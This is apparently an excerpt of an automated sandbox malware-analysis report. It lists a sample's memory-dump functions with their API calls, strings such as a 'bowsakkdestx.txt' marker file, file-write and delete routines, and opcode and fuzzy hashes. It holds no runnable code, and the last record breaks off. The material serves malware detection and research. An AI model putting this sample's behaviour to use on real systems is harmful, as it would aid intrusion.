                                                                                                                                                                                                                                        • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                                                                                                        • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                                                                                        • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                                                                                                                        • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                                                                                        • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                                                                                                                        • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                                                                                                                        • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                                                                                                        • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                                                                                        • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                                                        • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: p2Q
                                                                                                                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                                                                                                                        • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                                                                                                                        • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                                                                                        • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                                                                                                                        • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                                                                                        • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                                                                                                                        • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                                                                                        • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                                                                                                                        • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                                                                                                                                                          • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                                                                                                                                                          • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                                                                                                                                                          • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                                                                                                                                                          • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00425A37
                                                                                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00425A57
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                                                                                        • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                                                                                                                                                        • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 004127C3
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004127CE
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                                                                                        • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                                                                                                                                                        • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 00412806
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00412814
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041281F
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                                                                                        • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                                                                                                                                                                        • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
